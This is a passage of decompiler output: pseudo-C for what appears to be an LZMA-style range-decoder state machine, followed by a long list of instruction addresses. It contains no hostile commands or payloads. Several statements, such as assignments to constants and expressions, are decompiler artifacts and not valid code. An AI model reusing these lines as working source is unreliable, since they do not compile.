											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








              0x00000000
              0x00407291
              0x00407291
              0x00407295
              0x004072ba
              0x004072c4
              0x00000000
              0x00407297
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a4
              0x004072a8
              0x004072a8
              0x004072ab
              0x00407385
              0x00407385
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
